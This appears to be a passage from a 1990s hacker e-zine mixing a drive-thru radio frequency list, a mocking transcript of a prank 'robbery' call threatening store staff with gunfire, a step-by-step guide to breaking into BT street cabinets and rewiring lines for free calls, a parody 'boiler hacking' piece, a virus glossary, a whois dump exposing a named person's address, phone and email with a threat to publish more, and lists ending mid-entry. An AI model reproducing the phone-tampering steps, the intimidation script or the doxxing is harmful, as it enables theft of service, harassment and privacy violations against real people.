457.5375 461.0875 UNKNOWN OH area
457.5500 467.7750 UNKNOWN OH area
457.6000 467.8250 UNKNOWN OH area
460.8875 465.8875 UNKNOWN OH area
461.0375 466.0375 UNKNOWN OK/CA area
461.0875 466.0875 UNKNOWN OH area
462.1625 467.1625 UNKNOWN OH area
463.2875 468.2875 UNKNOWN NY area
464.5125 UNKNOWN UNKNOWN OH area
469.0125 464.0125 Germantown, MD
469.1875 464.1875 Frederick, MD
920.5000 WFM 903.5000 WFM Gaithersburg, MD
Rally's 457.5375 468.3875 UNKNOWN OH area
461.0875 466.0875 UNKNOWN OH area
461.5375 462.1625 Holland OH area
Roy Rogers 30.8400 154.5700 Germantown, MD
457.5375 467.7625 Washington, DC area
469.0125 464.0125 Germantown, MD
469.9250 464.9250 Vienna, VA
Taco Bell 30.8400 154.5700 Washington, DC area
33.1600 154.5150 Frederick, MD
33.4000 154.5400 Germantown, MD
460.8875 465.8875 Nationwide
461.0875 466.0875 UNKNOWN OH area
461.5375 UNKNOWN UNKNOWN OH area
464.9625 469.9625 UNKNOWN OH area
469.0125 464.0125 Reston, VA
Wendy's 33.4000 154.5400 Rockville, MD
49.8300 49.8900 UNKNOWN area **
457.5125 467.7375 UNKNOWN OH area
457.5375 467.7625 UNKNOWN OH area
457.6125 467.8375 Washington, DC area
460.8875 465.8875 Nationwide
461.0875 466.0875 UNKNOWN OH area
461.8125 UNKNOWN UNKNOWN OH area
464.3750 UNKNOWN Headquarters
464.5125 UNKNOWN Columbus, OH area
White Castle 457.6000 467.8250 UNKNOWN OH area
461.8125 UNKNOWN Columbus, OH area
- Have Phun!
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. Robbing Stores With Phones, A Real Example : The CrackHouse
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
the following is a transcript of a teleconference robbery of a
Wawa convience store, all names remain the same to fully implicate the
guilty. the sad thing is this is an actual transcript.
dk: Hello, listen very carefully I'm not going to repeat myself.
manager: Who is this?
dk: Don't worry about that, listen carefully, don't interrupt.
Are you the manager and if so what is your name?
manager: yes, i'm the manager, my names kathy.
dk:ok kathy, look across the street do you see the apartment complex
directly opposite you?
manager: yes.
dk: i have a man stationed in a car in that complex's parking lot.
he has a high powerd assault rifle aimed at the individual behind the
counter. i have another man stationed adjacent to the Wawa with a cellular
phone. what's the individual's name behind the cash register?
manager: her names Lori, please don't hurt anyone.
dk: no ones going to get hurt as long as you shut the fuck up and do
exactly as i say. instruct lori that she is to keep her hands on the
counter at all times, with her palms laid out flat. shes only to move
when she must make change for a customer, do not alert any customers in
the store kathy. do you understand me?
manager: yes i understand, hold on. (kathy then instructs lori)
please promise you won't hurt anyone? please.
dk: no ones getting hurt, now we got 30 seconds kathy from when
i say go, when i say go you grab a plastic bag, fill it with all the money
in the register furthest from the doorway and open the back door and
leave all the money there, then shut and lock the door.
manager: ok ok, do you want the foodstamps?
dk: no! the foodstamps go in a seperate bag.
sulfur: and get me a gatorade.
manager: a gatorade? what kind?
sulfur: if it's not a large im gonna open fire.
manager: ok just please don't hurt anyone.
dk: ok kathy, go! (theres a rustling of bags and some background noise)
manager: ok, done, now what?
dk: kathy have you made any attempt to contact any form of law
enforcement?
manager: no i promise.
sulfur: she's lying.
dk: kathy, do you know what a digital voice analyzer is? (dk is
now completely talking out his ass)
manager: no.
dk: well we have one connected to a polygraph examiner and its
telling us your lying kathy.
manager: i swear to you im not lying!
sulfur: shoot her
dk: kathy your lying.
manager: no no im not!
dk: your lying kathy, mike, open fire open fire!
z: open fire!!
manager: LORI!! DUCK!!
*click*
everyone on the conference call: BAHAHAHAHAHAHAHAHAHA
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
3. How To Rewire Your House For Free Phone Calls : WildFire
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)
How To Rewire You House For Free Fone Calls
In The U.K
(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)
By WildFire of AWOL
The aim is to teach you how to rewire your house to an engineer test line
for free Fone calls, you dont need any little coloured boxes etc, all you
need is a bit of patience and a lot of guts =)
EQUIPMENT -:
A B.T line into your house
Socket wrench with 1/2 inch bit
Offical looking enginner clothing (lumi jacket)
C.B radios (Optional)
STEP 1:
We need to find out some information about the your line
(Note : these numbers are not anything to do with your Fone number)
what we need to know is how it runs back to B.T
Eg. The pole outside your house is the first contact then it runs
underground to A big green box, these are called DP's
(Disconection/Connection points)
Fig 1.
House -----> Pole ------> Green box ------> B.T
\/ \/
Prefix = 46 95
The way to find this out is by sabotaging your house's fone line to get an
engininer to pay you a visit . With him he should bring a nice filo-fax with
all his jobs in (all the places he's got to visit and their line info etc.)
You now Have 3 options
(i) KILL HIM!! and steal all his neat stuff *
(ii) Act Intrested in his work and ask how he knows which line
is yours say you want to do work experience in B.T etc/etc
and he might show it to you and even explain it to you.
(iii) Sabotage your line in such a way he's got to go up your
pole , while he's trying to work out what the fuck you've done
have a look at the filo-fax and write down all your info.
* Not Recommended
There are probally other ways to get your info ie. Bullshiting the B.T depot.
or operators but they are not known my me , if anyone has any ideas i'd like
to hear from them...
STEP 2 : Decode
When you have the filo-fax in your hands flick through it, near the end should
be a page with your surname and telephone number..
below this should be the following ..........
PCP E P DP PR
15 15 360 1922 4
What we are concerned with are the DP, PCP and P
DP -- This is the pole, you can check this by going outside and looking
at it .
PCP/E -- This is the big green box have a look around your neighbourhood
not to be confused with cable green boxes !!.
P -- This is where your wire-pair are in the green box.
The other letters are probally what contact your wire-pair is on the pole etc.
Now You're Set To Go On An Adventure ..
Wait until darkness falls , Put on your funky glow in the dark jackets,
put the socket wrench in your pocket and take a visit to your local greener.
Look around for nosey OAP's or other paranoid people. I actually had the
shit kicked out of me by a large bloke who thought I was breaking into
his house because I was looking very suspect walking around the streets
stopping at the end of his road near the green box, ouch!
On the front of the box there should be 2 diamond shaped things, pull out the
wrench and undo them , the box should now open with ease..
You Should see loads of wires going all over the place. On the back of the
left door there should be a white box (like you the one you plug your fone
into back home) this is what the Enginerer uses for calls this is what we are
going to swap with your house pair .
How To Find Your Pair: There should be transparent plastic struts going from
top to bottom, they have holes (where the wires come through) with very
tiny numbers near them.
The Struts are divided up into hundreds , So if your "P" was 360 you go along
to the third strut and down until you find the tiny number 60 next to a hole.
(see fig 1.18291739)In this hole should be some wire's, with luck they should
be yours. Pull the wires out of the white-box and reconnect it to the wire
pair going to your house. (the use of radios for checking might be a good
idea)
Fig 1.18291739
100-200 200-300 300-400 400-500 500-600 600-700 700-800 800-900
Ý Ý Ý Ý Ý Ý Ý Ý
Ý Ý Ý Ý Ý Ý Ý Ý
Ý Ý Ý Ý Ý Ý Ý Ý
Ý Ý Ý Ý Ý Ý Ý Ý
Ý Ý Ý Ý Ý Ý Ý Ý
Ý Ý Ý Ý Ý Ý Ý Ý
Ý Ý Ý Ý Ý Ý Ý Ý
Ý Ý Ý Ý Ý Ý Ý Ý
Ý Ý Ý-360 Ý Ý Ý Ý Ý
Ý Ý Ý Ý Ý Ý Ý Ý
Ý Ý Ý Ý Ý Ý Ý Ý
Ý Ý Ý Ý Ý Ý Ý Ý
Go Home And See if You Have A Dial Tone .
Congratulations....
Your house is now ready for free calls ..
Dial 175 and get your new fone Number
Your old line will be in limbo so you might as well stop paying line rental,
so tell B.T to disconnect it.
Notes for use: If You're Leaving the dodgy line permanent then make
sure you hide the wires well..
If you are going to get your old line cut-off then make
sure all your wiring is back as it was before.
Don't tell Stupid People your number.
Don't call Operators etc.
When we used this method we only connected the dodgy line when we needed it,
so I don't know what will happen if left on a permenent basis ???!"*
The information in this file came from alot of Trial & Error so some facts
may be incorrect.. (Anyway it worked for us!).
<You didnt learn this from me , and I didnt just tell you that ?Confused?>
----------- WildFire -----------
----------- AWOL '97 -----------
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. Hacking Electrical Items Part 2, The Sequel : Tetsu Khan
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
LAst TiME wE WuZ Hax0Rin' ToAsTAz, So foR Dis TiMe i BeeN ThINkin On WhUT wE
ShOUld hAx0R, aNd I ThOUghT, "eYe WiLL WrItE AbOuT....BOiLAhS!!! YeS, ThOsE
boILaHs yEw FiNd In yOuR BaSEmEnt!!" AnD So I StArTed To pLaY ArouND WifF Muh
BoiLAh AT h0me, NoW Yew caN REwt YoUr BoILah Tew!!!
FiNDiNg OuT dA OS ThaT ThA BoiLaH iZ RuNNiN'
--------------------------------------------
yEw Can DeW ThIS 3 WayZ...
1: LeWk FoR a StIcKA On It DaT Sez.
2: FiNd A CoNsOle On DA BoiLAh, ThEn, If IT hAs A kEYbOArd (DepEndZ oN
MaNuFAcTuReR) tYpE "uname -a" AnD It WiLL Tell YeW!
3: FiNd Da ManUaL FoR YouR BOilaH (easiest way)
WhEn YoU KnOw YoUr BoILaHs oPeRATinG SyStEm, yEw cAN PRocEEd To Hax0R It...
---------------------------------------------------------------------------
Hax0RinG a BoILaH KaN BeE VeRy DangERous, LiKE Hax0Rin' A nuKelear PoWaHH
sTAtIon, So MaKe sHuRe YeW dO ThE fOLLowiNG...
1: PuT oN PrOtECtivE CloThInG, LikE GloVeS, AnD a hAT, aNd MaYBe a sCarF,
tHis Is BeCoS BaSEmEnts CaN bE CooOLD, aNd YEw WouLDnt WanT To CaTch A
ChiLL wOULd YeW?
2: MaKE ShURe YeW HaVE A SpAnnEr Or WreNCH, As YoU WiLL NeEd ThEsE tO FiNd
hIdDEn pOrTz AnD TeW Eye-PeE SpoOF fRom TruSteD HoStS (liKe a SinK, oR
A pIpE, Or A WaSHing MaChInE)
LiKE WiV ToAsTeRz, We wILL fiRsT nEeD tO FiNd HiDDeN PoRtS, So wE NeEd To
ScAn FoR tHem, bOilAhz ArE BiGGer tHan tOASterz, sO ThiS MaY tAke SoMe TiMe.
YeW cAn LeWk FoR SucH HiDDen PoRtS bY dOIng ThEsE tHinGs...
1: LeWKiNg ArOunD ThE BoILaH wIV yOUR EyeS.
2: TrAcInG PiPeS aLL ArOuND yOuR hOuSe (bit like traceroute programs do)
3: UsInG StEalTh TEkNiquEs By HidInG ArOuND yOuR hOuSE AnD LIsTENinG fOr
WaTeR, liKE FrOm TaPs aNd StUFf...
If YoU dOnT FiNd AnY HIdDen PoRtS, ThEN YeW cAN JuST LoGiN FrOM a WaSHiNG
MaChIne, Or OtHeR tRUstEd HoSt On ThE NeTwOrK, wHeN yOu COnnEcT tO tHa
BoiLaH FRoM tHe WasHiNg MaChINe YeW wiLL sEe sOmeThInG LiKe ThIs...
+-------------------+
| GEneRaL eLeKTrIk |
| M:0225 |
| S:b4588 |
| T:02 |
+-------------------+
BoiLaH OS RelEasE 2.54 (bIg BaAAadAss BoILaH)
login: BoiLaH
password: <--- We AttEmPtid ThE DeFauLt "BoiLaH"
------------------------------------------------------------
L0ghINn GRaNTiD
***************
------------------------------------------------------------
WeLKoMe To bOiLAh
[BOPR]
bOiLiNg OpErAtIoNS PlaN rEsPonSe
------------------------------------------------------------
login on tty[wAShInG mAcHiNE]
last login from BaTHrEwm.COM on tty[ShOwEr] at 7:43p.m.
1: sHuTDoWn
2: CoLd WaTeR
3: hOt wAtEr
4: UNiX TyPE SheLL ENViRONMEnT
If YeW GhET THiS YEW ArE COOL)(#*$ Ok NoW CHEwZe NuMbAhh 4, ThEn YeWsE
ThIS uniVeRSaL BoiLAhh ExPLoiT...
% fuck yew eye am eleet and k-r4d 'cos muh name iz ZeroCool!
fuck : command not found
% whoami
root
%
tHe bEst tImEs To ReWT BoILaHs Is lAtE aT nIgHt WhEn No-OnE Is LOggEd-In, CoS
In ThA dAY, yEw GEt uSeRs LoGgEd iN To DoWLoAd WatEr AnD ShIt.
eYe WiLL KoNItuE wItH oTheR ExAMplEs NeXt TiMe!
T_K
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. Virus Definitions : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
This is for all you lame fucks out there who say I infect your systems with
viruses, even when the only malicious shit I code are Windoze killers, anyway
here are a few definitions, just so you know what you're on about next time =)
What are computer viruses (and why should I worry about them)?
--------------------------------------------------------------
According to Fred Cohen's well-known definition, a COMPUTER VIRUS is a
computer program that can infect other computer programs by modifying
them in such a way as to include a (possibly evolved) copy of itself.
Note that a program does not have to perform outright damage (such as
deleting or corrupting files) in order to to be called a "virus".
However, Cohen uses the terms within his definition (e.g. "program"
and "modify") a bit differently from the way most anti-virus
researchers use them, and classifies as viruses some things which most
of us would not consider viruses.
Many people use the term loosely to cover any sort of program that
tries to hide its (malicious) function and tries to spread onto as
many computers as possible. (See the definition of "Trojan".) Be
aware that what constitutes a "program" for a virus to infect may
include a lot more than is at first obvious - don't assume too much
about what a virus can or can't do!
These software "pranks" are very serious; they are spreading faster
than they are being stopped, and even the least harmful of viruses
could be fatal. For example, a virus that stops your computer and
displays a message, in the context of a hospital life-support
computer, could be fatal. Even those who created the viruses could
not stop them if they wanted to; it requires a concerted effort from
computer users to be "virus-aware", rather than the ignorance and
ambivalence that have allowed them to grow to such a problem.
What is a Trojan Horse?
-----------------------
A TROJAN HORSE is a program that does something undocumented which the
programmer intended, but that the user would not approve of if he knew
about it. According to some people, a virus is a particular case of a
Trojan Horse, namely one which is able to spread to other programs
(i.e., it turns them into Trojans too). According to others, a virus
that does not do any deliberate damage (other than merely replicating)
is not a Trojan. Finally, despite the definitions, many people use
the term "Trojan" to refer only to a *non-replicating* malicious
program, so that the set of Trojans and the set of viruses are
disjoint.
What are the main types of PC viruses?
--------------------------------------
Generally, there are two main classes of viruses. The first class
consists of the FILE INFECTORS which attach themselves to ordinary
program files. These usually infect arbitrary .COM and/or .EXE
programs, though some can infect any program for which execution is
requested, such as .SYS, .OVL, .PRG, & .MNU files.
File infectors can be either DIRECT ACTION or RESIDENT. A direct-
action virus selects one or more other programs to infect each time
the program which contains it is executed. A resident virus hides
itself somewhere in memory the first time an infected program is
executed, and thereafter infects other programs when *they* are
executed (as in the case of the Jerusalem) or when certain other
conditions are fulfilled. The Vienna is an example of a direct-action
virus. Most other viruses are resident.
The second category is SYSTEM or BOOT-RECORD INFECTORS: those viruses
which infect executable code found in certain system areas on a disk
which are not ordinary files. On DOS systems, there are ordinary
boot-sector viruses, which infect only the DOS boot sector, and MBR
viruses which infect the Master Boot Record on fixed disks and the DOS
boot sector on diskettes. Examples include Brain, Stoned, Empire,
Azusa, and Michelangelo. Such viruses are always resident viruses.
Finally, a few viruses are able to infect both (the Tequila virus is
one example). These are often called "MULTI-PARTITE" viruses, though
there has been criticism of this name; another name is "BOOT-AND-FILE"
virus.
FILE SYSTEM or CLUSTER viruses (e.g. Dir-II) are those which modify
directory table entries so that the virus is loaded and executed
before the desired program is. Note that the program itself is not
physically altered, only the directory entry is. Some consider these
infectors to be a third category of viruses, while others consider
them to be a sub-category of the file infectors.
What is a stealth virus?
------------------------
A STEALTH virus is one which hides the modifications it has made in
the file or boot record, usually by monitoring the system functions
used by programs to read files or physical blocks from storage media,
and forging the results of such system functions so that programs
which try to read these areas see the original uninfected form of the
file instead of the actual infected form. Thus the viral modifications
go undetected by anti-viral programs. However, in order to do this,
the virus must be resident in memory when the anti-viral program is
executed.
Example: The very first DOS virus, Brain, a boot-sector infector,
monitors physical disk I/O and re-directs any attempt to read a
Brain-infected boot sector to the disk area where the original boot
sector is stored. The next viruses to use this technique were the
file infectors Number of the Beast and Frodo (= 4096 = 4K).
Countermeasures: A "clean" system is needed so that no virus is
present to distort the results. Thus the system should be built from
a trusted, clean master copy before any virus-checking is attempted;
this is "The Golden Rule of the Trade." With DOS, (1) boot from
original DOS diskettes (i.e. DOS Startup/Program diskettes from a
major vendor that have been write-protected since their creation);
(2) use only tools from original diskettes until virus-checking has
completed.
What is a polymorphic virus?
----------------------------
A POLYMORPHIC virus is one which produces varied (yet fully
operational) copies of itself, in the hope that virus scanners
will not be able to detect all instances of the virus.
One method to evade signature-driven virus scanners is self-encryption
with a variable key; however these viruses (e.g. Cascade) are not
termed "polymorphic," as their decryption code is always the same and
thus can be used as a virus signature even by the simplest, signature-
driven virus scanners (unless another virus or program uses the
identical decryption routine).
One method to make a polymorphic virus is to choose among a variety of
different encryption schemes requiring different decryption routines:
only one of these routines would be plainly visible in any instance of
the virus (e.g. the Whale virus). A signature-driven virus scanner
would have to exploit several signatures (one for each possible
encryption method) to reliably identify a virus of this kind.
A more sophisticated polymorphic virus (e.g. V2P6) will vary the
sequence of instructions in its copies by interspersing it with
"noise" instructions (e.g. a No Operation instruction, or an
instruction to load a currently unused register with an arbitrary
value), by interchanging mutually independent instructions, or even by
using various instruction sequences with identical net effects (e.g.
Subtract A from A, and Move 0 to A). A simple-minded, signature-based
virus scanner would not be able to reliably identify this sort of
virus; rather, a sophisticated "scanning engine" has to be constructed
after thorough research into the particular virus.
The most sophisticated form of polymorphism discovered so far is the
MtE "Mutation Engine" written by the Bulgarian virus writer who calls
himself the "Dark Avenger". It comes in the form of an object module.
Any virus can be made polymorphic by adding certain calls to the
assembler source code and linking to the mutation-engine and
random-number-generator modules.
The advent of polymorphic viruses has rendered virus-scanning an ever
more difficult and expensive endeavor; adding more and more search
strings to simple scanners will not adequately deal with these
viruses.
What is a companion virus?
--------------------------
A COMPANION virus is one which, instead of modifying an existing file,
creates a new program which (unknown to the user) gets executed by the
command-line interpreter instead of the intended program. (On exit,
the new program executes the original program so that things will
appear normal.) The only way this has been done so far is by creating
an infected .COM file with the same name as an existing .EXE file.
Note that those integrity checkers which look only for *modifications*
in *existing* files will fail to detect such viruses.
(Note that not all researchers consider this type of malicious code
to be a virus, since it does not modify existing files.)
Miscellaneous Jargon and Abbreviations
--------------------------------------
BSI = Boot Sector Infector: a virus which takes control when the
computer attempts to boot (as opposed to a file infector).
CMOS = Complementary Metal Oxide Semiconductor: A memory area that is
used in AT and higher class PCs for storage of system information.
CMOS is battery backed RAM (see below), originally used to maintain
date and time information while the PC was turned off. CMOS memory
is not in the normal CPU address space and cannot be executed. While
a virus may place data in the CMOS or may corrupt it, a virus cannot
hide there.
DOS = Disk Operating System. We use the term "DOS" to mean any of the
MS-DOS, PC-DOS, or DR DOS systems for PCs and compatibles, even
though there are operating systems called "DOS" on other (unrelated)
machines.
MBR = Master Boot Record: the first Absolute sector (track 0, head 0,
sector 1) on a PC hard disk, that usually contains the partition table
(but on some PCs may simply contain a boot sector). This is not the
same as the first DOS sector (Logical sector 0).
RAM = Random Access Memory: the place programs are loaded into in
order to execute; the significance for viruses is that, to be active,
they must grab some of this for themselves. However, some virus
scanners may declare that a virus is active simply when it is found
in RAM, even though it might be simply left over in a buffer area of
RAM rather than truly
being active.
TOM = Top Of Memory: the end of conventional memory, an architectural
design limit at the 640K mark on most PCs. Some early PCs may not
be fully populated, but the amount of memory is always a multiple of
64K. A boot-record virus on a PC typically resides just below this
mark and changes the value which will be reported for the TOM to the
location of the beginning of the virus so that it won't get
overwritten. Checking this value for changes can help detect a
virus, but there are also legitimate reasons why it may change.
A very few PCs with unusual memory managers/settings may
report in excess of 640K.
TSR = Terminate but Stay Resident: these are PC programs that stay in
memory while you continue to use the computer for other purposes;
they include pop-up utilities, network software, and the great
majority of viruses. These can often be seen using utilities such as
MEM, MAPMEM, PMAP, F-MMAP and INFOPLUS.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
3. Fun With whois, sinnerz.com : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Lewk WhuT eyE FoUnd...
phish:~> whois sinerz.com
[rs.internic.net]
SIN (SINNERZ3-DOM)
130 105th Ave. S.E. Apt. 218
Bellevue, Wa 98004
USA
Domain Name: SINNERZ.COM
Administrative Contact:
Kimminau, Suzette (SK2455) evilchic@NWLINK.COM
(206)454-7176
Technical Contact, Zone Contact:
Schmittel, Blair (BS469) blair@CYBER-NAUT.COM
(801)654-3139
Record last updated on 26-Mar-97.
Record created on 26-Mar-97.
Domain servers in listed order:
STRECH.CYBER-NAUT.COM 192.41.77.5
ITIS.EASILINK.COM 192.41.78.2
The InterNIC Registration Services Host contains ONLY Internet Information
(Networks, ASN's, Domains, and POC's).
Please use the whois server at nic.ddn.mil for MILNET Information.
phish:~> fwhois sinnerz.com@nic.ddn.mil
[nic.ddn.mil]
No match for "SINNERZ.COM".
Please be advised that this whois server only contains DOD Information.
All INTERNET Domain, IP Network Number, and ASN records are kept in
the Internet Registry, RS.INTERNIC.NET.
-------------------------------------------------------------------------------
=--> S.I.N : [S] cared sh [I] tless lame fucks not-so-a [N] onymous. <--=
-------------------------------------------------------------------------------
If sIn play this down as fake, why not phone up Evil Chic and ask if Suzey is
there? You will soon find out the truth =) Expect details of all sIn members
soon.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
4. Hacking Space Shuttles, Abort Codes : NailGun
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Okay, if you ever decide to hack a space shuttle (*.arc.nasa.gov is hacked very
frequently) and you actually plan it all out, make sure you collect all the
parts of this "mini-guide" of little things that are important and you will need
to know, this section concerns....
SPACE SHUTTLE ABORT MODES
-------------------------
Space Shuttle launch abort philosophy aims toward safe and intact
recovery of the flight crew, orbiter and its payload.
Abort modes include:
* Abort-To-Orbit (ATO) -- Partial loss of main engine thrust late enough
to permit reaching a minimal 105-nautical mile orbit with orbital
maneuvering system engines.
* Abort-Once-Around (AOA) -- Earlier main engine shutdown with the
capability to allow one orbit around before landing at Edwards Air
Force Base, Calif.; White Sands Space Harbor (Northrup Strip), N.M.;
or the Shuttle Landing Facility (SLF) at Kennedy Space Center, Fla..
* Trans-Atlantic Abort Landing (TAL) -- Loss of two main engines midway
through powered flight would force a landing at Banjul, The Gambia;
Ben Guerir, Morocco; or Moron, Spain.
* Return-To-Launch-Site (RTLS) -- Early shutdown of one or more engines
and without enough energy to reach Banjul would result in a pitch
around and thrust back toward KSC until within gliding distance of the
SLF.
STS-35 contingency landing sites are Edwards AFB, White Sands,
Kennedy Space Center, Banjul and Ben Guerir, Moron.
Next time we will probably look at the payloads of space shuttles, l8r.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
5. Country Domain Listing : SirLance
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Listing Of Domains By Country, like *.fr *.uk etc. etc.
AD - Andorra - Andorre
AE - Imarata al Arabiya al Muttahidah - Ittihad al Imirat alArabiya - United Arab Emirates
AF - Afghanistan - Afghanestan
AG - Antigua and Barbuda
AI - Anguilla
AL - Shqipëria - Albania
AM - Armenia - Hayastan
AN - Netherlands Antilles - Nederlandse Antillen
AO - Angola
AQ - Antarctica
AR - Argentina
AS - American Samoa
AT - Austria - Osterreich
AU - Australia
AW - Aruba
AZ - Azerbaijan - Azerbaycan
BA - Bosnia and Herzegovina - Bosna i Hercegovina
BB - Barbados
BD - Bangladesh
BE - Belgium - Belgique - Belgie
BF - Burkina
BG - Bulgaria
BH - Bahrain - Bahrayn
BI - Burundi
BJ - Benin
BM - Bermuda
BN - Brunei
BO - Bolivia
BR - Brazil - Brasil
BS - Bahamas
BT - Bhutan
BV - Bouvet Island - Bouvetoya
BW - Botswana
BY - Belarus - Byelarus'
BZ - Belize
CA - Canada
CC - Cocos (Keeling) Islands (Australia)
CF - Central Africa
CG - Congo
CH - Switzerland - Schweiz - Suisse - Svizzera - Svizra - Helvetia
CI - Cote d'Ivoire
CK - Cook Islands
CL - Chile
CM - Cameroon
CN - China
CO - Colombia
CR - Costa Rica
CS - Czechoslovakia
CU - Cuba
CV - Cape Verde - Cabo Verde
CX - Christmas Island (Australia)
CY - Cyprus
CZ - Czech Republic - Cechy
DD - Germany - Deutschland
DE - Germany - Deutschland
DJ - Djibouti
DK - Denmark - Danmark
DM - Dominica
DO - Dominican Republic - Republica Dominicana
DZ - Algeria - Jaza'ir
EC - Ecuador
EE - Estonia - Eesti
EG - Egypt - Misr
EH - Western Sahara
ER - Eritrea
ES - Spain - Espana
ET - Ethiopia - Ityop'iya
FI - Finland - Suomi
FJ - Fiji
FK - Falkland Islands
FM - Micronesia
FO - Faroe Islands - Faroyar
FR - France
FX - Metropolitan France
GA - Gabon
GB - United Kingdom
GD - Grenada
GE - Georgia - Sak'art'velo
GF - French Guiana - Guyane
GH - Ghana
GI - Gibraltar (UK)
GL - Greenland - Kalaallit Nunaat
GM - The Gambia
GN - Guinea - Guinee
GP - Guadaloupe (France)
GQ - Equatorial Guinea - Guinea Ecuatorial
GR - Greece - Ellas
GS - South Georgia
GT - Guatemala
GU - Guam
GW - Guinea-Bissau - Guine-Bissau
GY - Guyana
HK - Hong Kong (UK)
HM - Heard Island and McDonald Islands (Australia)
HN - Honduras
HR - Croatia - Hrvatska
HT - Haiti
HU - Hungary - Magyarorszag
ID - Indonesia
IE - Ireland - Éire
IL - Israel - Yisra'el
IN - India - Bharat
IO - Indian Ocean Territory (UK)
IQ - Iraq
IR - Iran
IS - Island - Iceland
IT - Italy - Italia
JM - Jamaica
JO - Jordan - Urdun
JP - Japan
KE - Kenya
KG - Kyrgyzstan
KH - Cambodia - Kampuchea
KI - Kiribati
KM - Comoros - Comores
KN - Saint Kitts and Nevis
KP - Korea - Choson
KR - Korea
KW - Kuwait - Kuwayt
KY - Cayman Islands
KZ - Kazakhstan
LA - Laos
LB - Lebanon - Lubnaniyah
LC - Saint Lucia
LI - Liechtenstein
LK - Sri Lanka
LR - Liberia
LS - Lesotho
LT - Lithuania - Lietuva
LU - Luxembourg
LV - Latvia - Latvija
LY - Libya - Libiya
MA - Morocco - Maghrib
MC - Monaca
MD - Moldova
MG - Madagascar
MH - Marshall Islands
MK - Macedonia - Makedonija
